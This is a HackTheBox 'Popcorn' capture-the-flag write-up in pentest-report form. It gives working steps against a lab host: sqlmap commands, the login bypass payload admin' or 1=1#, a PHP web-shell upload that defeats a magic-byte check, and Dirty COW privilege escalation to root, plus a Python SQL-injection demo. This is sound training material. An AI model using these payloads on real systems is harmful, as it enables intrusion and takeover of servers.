Popcorn CTF Writeup

This is a writeup presented by Behind Security as part of the Road to OSCP series, focusing on the Popcorn CTF from HackTheBox.

Popcorn CTF

Popcorn, while not overly complicated, contains quite a bit of content and it can be difficult for some users to locate the proper attack vector at first. This machine mainly focuses on different methods of web exploitation.

Executive Summary

This penetration test report outlines the security assessment activities conducted against the host at IP address 10.10.10.6. The assessment uncovered several critical and moderate vulnerabilities that pose significant security risks to the tested infrastructure.

Introduction

This report details the findings resulting from the security assessment conducted on the target with IP address 10.10.10.6. The assessment aimed to identify vulnerabilities that could be exploited by a potential adversary to gain unauthorized access and compromise the security of the infrastructure.

Objective

The objective of this security assessment was to identify and exploit vulnerabilities in the target's infrastructure to assess the effectiveness of existing security measures and provide recommendations to mitigate the identified risks.

Requirements

  • Identification of vulnerabilities in the web application hosted at IP address 10.10.10.6.
  • Exploitation of critical and moderate vulnerabilities to assess potential exposure to attacks.
  • Evaluation of the possibility of unauthorized access to systems and data.

High-Level Summary of Found Vulnerabilities

  1. Directory Bruteforcing (Moderate): Hidden directories were enumerated through a directory bruteforcing attack on the web application. Implementation of security measures such as Web Application Firewalls (WAFs) and removal of unnecessary directories is recommended.

  2. SQL Injection (High): A successful SQL injection vulnerability exploitation allowed unauthorized access to the database. The recommendation is to review and sanitize the application's code, using prepared statements and parameterized queries to prevent SQL injection attacks.

  3. Authentication Bypass (High): Authentication was bypassed through an SQL injection vulnerability, granting access as an administrator without valid credentials. Implementation of proper input validation and robust authentication mechanisms is recommended.

  4. Arbitrary File Upload (High): Exploitation of the file upload feature enabled the insertion of a malicious PHP shell, potentially allowing remote command execution. The application should rigorously validate uploaded files and bolster security controls.

  5. Root Privilege Escalation (Extreme): A critical privilege escalation vulnerability was identified in the kernel, allowing an attacker to gain root privileges. Urgent kernel update is crucial to patch this security vulnerability.

Recommendations

  1. Implement a Web Application Firewall (WAF) to detect and block malicious directory enumeration attempts.
  2. Sanitize the application's code to prevent SQL injections, using prepared statements and parameterized queries.
  3. Strengthen authentication mechanisms, including proper input validation and multi-factor authentication.
  4. Thoroughly validate uploaded files, reject unauthorized formats, and enhance upload controls.
  5. Perform an immediate kernel update to address the privilege escalation vulnerability.

Methodology

  1. Reconnaissance: The initial phase involved gathering information about open ports.

  2. Enumeration: In this phase, Behind Security conducted an in-depth enumeration of the target system, identifying exposed services, web server directories, and potential entry points for further analysis.

  3. Vulnerability Assessment: Automated scanning tools and manual techniques were employed to identify potential security vulnerabilities in the web application and server configuration.

  4. Exploitation: Vulnerabilities that posed significant risks were further exploited to verify their impact on the system’s security.

  5. Post-Exploitation: In the final phase, Behind Security attempted to escalate privileges and gain deeper access to the system, simulating real-world attack scenarios.

Color Legend

Console color legend:

Standard console text
Commands inputted by the pentester
Text that we want to highlight
{...} Abbreviated output for brevity

Risk Classification

Risk Classification from http://www.pentest-standard.org

Independent Challenge - 10.10.10.6

export IP=10.10.10.6

Service Enumeration

IP Address    Ports Open
10.10.10.6    TCP: 22, 80

Web Server Enumeration

Directory Bruteforcing

Vulnerability Explanation: Behind Security was able to enumerate the directory tree of the web server further by conducting a directory bruteforcing attack, leading to the discovery of hidden directories and a potential entry point.

Vulnerability Fix: To mitigate this vulnerability, the web server should implement security measures such as Web Application Firewalls (WAFs) to detect and block excessive or malicious directory enumeration attempts. Additionally, unnecessary hidden directories should be removed, and access to sensitive directories should be restricted.

Severity: Moderate

Steps to Reproduce the Attack: Execute the command: feroxbuster -u http://10.10.10.6 -w /usr/share/wordlists/dirb/common.txt -t 10 -d 3 -o scans/ferox-common

Directory bruteforcing snippet
Main page - Torrent

SQL Injection

Vulnerability Explanation: A SQL injection vulnerability was identified in the login form at http://10.10.10.6/torrent/login.php. Behind Security exploited it with sqlmap and gained unauthorized read access to the database. This is a high risk because it exposes sensitive information, including user emails and usernames.

Vulnerability Fix: To address this vulnerability, the application's code must be reviewed and sanitized to prevent SQL injection attacks. Prepared statements and parameterized queries should be used to ensure proper input validation and data protection.

Severity: High

Steps to Reproduce the Attack:

  1. Submit a single quote (') as the username. The application returns a verbose SQL error, which shows that the input reaches the query unescaped and that error-based injection is possible.
  2. Let sqlmap confirm and exploit it (the * marks the injection point, and --technique=E selects error-based injection): sqlmap -u http://10.10.10.6/torrent/login.php --data "username=*&password=admin" --threads=10 --technique=E --batch
  3. Dump the users table: sqlmap -u http://10.10.10.6/torrent/login.php --data "username=*&password=admin" --threads=10 --technique=E -T users --dump
Testing SQL injection
Error message
sqlmap output

Authentication Bypass

Vulnerability Explanation: A SQL injection vulnerability at http://10.10.10.6/torrent/login.php enabled Behind Security to bypass authentication and log in as an admin (this attack also extends to every other user on the system) without valid credentials.

Vulnerability Fix: This vulnerability can be remediated by implementing proper input validation and authentication mechanisms. Input should be sanitized, and multi-factor authentication can be used to enhance security.

Severity: High

Steps to Reproduce the Attack:

  1. Visit http://10.10.10.6/torrent/login.php.
  2. In the username field, enter admin' or 1=1# along with any password. The quote closes the username literal, or 1=1 makes the WHERE clause always true, and # comments out the password check that follows (# is a line comment in MySQL, which the working payload indicates is the backend). Substituting another username in place of admin logs in as that user instead.
Torrent Admin Panel
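The SQL injection and authentication bypass findings above share one root cause, so here is a single added example (written for this page, not code from the original writeup or from the torrent application) that reproduces both against an in-memory SQLite table. It assumes a users table with MD5 password hashes and a login query built by string concatenation, as in the classic PHP pattern; the sample users are constructed. Because SQLite has no # line comment, the bypass is executed with the equivalent "-- " form, and the writeup's MySQL payload is only rendered as the query the target's server would see.

```python
import hashlib
import sqlite3

# Constructed sample data for the demo, not the target's real users table.
SAMPLE_USERS = [
    ("admin", "S3cretAdminPw", "admin@example.com"),
    ("alice", "alicepass", "alice@example.com"),
]

# Payload from the writeup (MySQL: '#' starts a line comment) and the
# SQLite-compatible equivalent used to run the demo.
BYPASS_PAYLOAD_MYSQL = "admin' or 1=1#"
BYPASS_PAYLOAD_SQLITE = "admin' or 1=1-- "


def md5_hex(s: str) -> str:
    # Assumption for this demo: passwords are stored as unsalted MD5 hashes.
    return hashlib.md5(s.encode()).hexdigest()


def make_db() -> sqlite3.Connection:
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, "
        "password TEXT, email TEXT)"
    )
    conn.executemany(
        "INSERT INTO users (username, password, email) VALUES (?, ?, ?)",
        [(u, md5_hex(p), e) for u, p, e in SAMPLE_USERS],
    )
    return conn


def show_effective_query(username: str, password: str) -> str:
    """The query text a string-concatenating login handler would send to the DB."""
    return (
        "SELECT username FROM users "
        f"WHERE username='{username}' AND password='{md5_hex(password)}'"
    )


def vulnerable_login(conn, username: str, password: str):
    """String-concatenated query in the style of
    "SELECT ... WHERE username='$user' AND password='$hash'".
    Returns the username the application would log in as, or None.
    Note that hashing the password does nothing against the injection."""
    row = conn.execute(show_effective_query(username, password)).fetchone()
    return row[0] if row else None


def safe_login(conn, username: str, password: str):
    """Parameterized version: the payload is compared as data, never parsed as SQL."""
    row = conn.execute(
        "SELECT username FROM users WHERE username=? AND password=?",
        (username, md5_hex(password)),
    ).fetchone()
    return row[0] if row else None


def probe_single_quote(conn) -> bool:
    """Step 1 of the writeup: a lone quote leaves an unterminated string literal.
    Returns True when the database raises a syntax error (the SQL error page)."""
    try:
        vulnerable_login(conn, "'", "x")
    except sqlite3.Error:
        return True
    return False


if __name__ == "__main__":
    conn = make_db()
    print("quote probe raises error:", probe_single_quote(conn))
    print("query the target would run:", show_effective_query(BYPASS_PAYLOAD_MYSQL, "x"))
    print("vulnerable handler logs in as:", vulnerable_login(conn, BYPASS_PAYLOAD_SQLITE, "x"))
    print("targeting another user:", vulnerable_login(conn, "alice'-- ", "x"))
    print("parameterized handler logs in as:", safe_login(conn, BYPASS_PAYLOAD_SQLITE, "x"))
```

The always-true clause returns every row and the handler takes the first one, which is why the bypass lands on admin here (inserted first) and on the target; replacing admin with another name and commenting out the rest logs in as that user, matching the writeup's observation that the bypass extends to every account.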

Initial Access - Arbitrary File Upload

Vulnerability Explanation: An attacker who can edit a torrent (here, after the authentication bypass above) can replace its icon with a PHP web shell in order to execute commands on the web server. Successful exploitation requires bypassing the server-side "magic byte" check on the uploaded image.

Vulnerability Fix: To address this vulnerability, the application should thoroughly validate uploaded files, ensuring they adhere to acceptable formats. Additionally, server-side validation should be augmented to prevent the bypass of security checks.

Severity: High

Steps to Reproduce the Attack:

  1. Log in as admin using the login form at http://10.10.10.6/torrent/login.php (use admin' or 1=1# as the username and any password).
  2. Browse to http://10.10.10.6/torrent/index.php?mode=directory.
  3. Click on the "Kali Linux" torrent that was uploaded in 2017.
  4. When the torrent's detail window pops up, click to edit its icon.
  5. Behind Security used this PHP reverse shell to get a connection, but any PHP code will execute.
  6. Set up the Burp Suite proxy and capture the request made when uploading a legitimate PNG as the torrent icon.
  7. In the captured request, keep the PNG signature (the PNG bytes and the line break that follows) at the start of the file body and replace everything after it with the PHP code; the server's magic-byte check only inspects those leading bytes.
  8. Change the uploaded filename so it ends in .php and forward the request. Loading the renamed upload makes the server execute the PHP, and the reverse shell connects back.
Editing the request in burpsuite

Post Exploitation

LPE to root

Vulnerability Explanation: The machine's kernel version, 2.6.31-14-generic-pae, dates back to 2009 and is susceptible to the "Dirty Cow" vulnerability (CVE-2016-5195). This flaw enables an attacker with an unprivileged account to exploit the kernel and gain root privileges.

Vulnerability Fix: To mitigate this critical vulnerability, the system's kernel should be updated to a version that includes the necessary security patches.

Severity: Extreme

Steps to Reproduce the Attack:

  1. Confirm the kernel version: uname -a
  2. Download the Dirty COW exploit (dirty.c) and transfer it to a writable directory on the victim, such as /dev/shm.
  3. Compile it: gcc -pthread dirty.c -o dirty -lcrypt
  4. Run it: ./dirty
  5. When prompted, set a password for the new account. The exploit backs up /etc/passwd to /tmp/passwd.bak, then uses the Dirty COW race to overwrite the root entry with a new uid 0 user named firefart carrying that password; because the write is a race, it can take a few seconds to land.
  6. Switch to the new account: su firefart. After collecting the proof, restore the original file with mv /tmp/passwd.bak /etc/passwd, since the system's real root entry has been overwritten.
Proof of Exploitation: REDACTED /root/root.txt

Conclusion

We hope you have found our content useful and invite you to explore more of our website to discover other interesting topics we cover. From cybersecurity to programming, we strive to provide our readers with the latest and most relevant information that can help them stay informed and ahead of the curve. We are committed to providing the best user experience to you and are open to feedback and suggestions through our contact form. Thank you for choosing Behind Security, we hope to see you again soon! 
